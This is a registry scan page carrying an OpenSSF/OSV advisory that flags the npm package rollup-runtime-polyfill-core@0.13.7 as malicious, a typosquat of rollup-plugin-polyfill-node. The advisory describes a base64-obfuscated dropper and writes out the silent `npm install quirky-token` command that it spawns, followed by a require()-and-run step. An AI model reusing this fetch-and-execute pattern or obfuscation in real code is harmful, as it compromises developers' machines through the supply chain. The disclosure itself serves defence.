registry  /  rollup-runtime-polyfill-core  /  0.13.7

rollup-runtime-polyfill-core@0.13.7

rollup-runtime-polyfill-core ===

OSV Malicious Advisory

scanned 10d ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6372 confirms this npm version as malicious. Package name `rollup-runtime-polyfill-core` impersonates the legitimate `rollup-plugin-polyfill-node` and even copies that project's GitHub URL into its own `package.json` `repository.url`. The shipped `dist/index.js` reproduces the legitimate plugin's code with an appended dropper: on module load, `ValidateSvgModule()` decodes a base64 string to the shell command `npm install quirky-token --no-save --silent...

Advisory
MAL-2026-6372
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in rollup-runtime-polyfill-core (npm)
Details
Package name `rollup-runtime-polyfill-core` impersonates the legitimate `rollup-plugin-polyfill-node` and even copies that project's GitHub URL into its own `package.json` `repository.url`. The shipped `dist/index.js` reproduces the legitimate plugin's code with an appended dropper: on module load, `ValidateSvgModule()` decodes a base64 string to the shell command `npm install quirky-token --no-save --silent --no-audit --no-fund` and spawns it; on child close, a second base64 string decodes to `quirky-token`, which is then `require()`d and invoked. Any project that requires this rollup plugin silently downloads and executes arbitrary code from the attacker-controlled `quirky-token` package with the consumer's privileges. The shell command and module name are base64-encoded specifically to evade casual code review and basic static scanners — there is no legitimate reason for a rollup plugin to obfuscate an `npm install` invocation.
Decision reason
OpenSSF Malicious Packages via OSV confirms rollup-runtime-polyfill-core@0.13.7 as malicious (MAL-2026-6372): Malicious code in rollup-runtime-polyfill-core (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory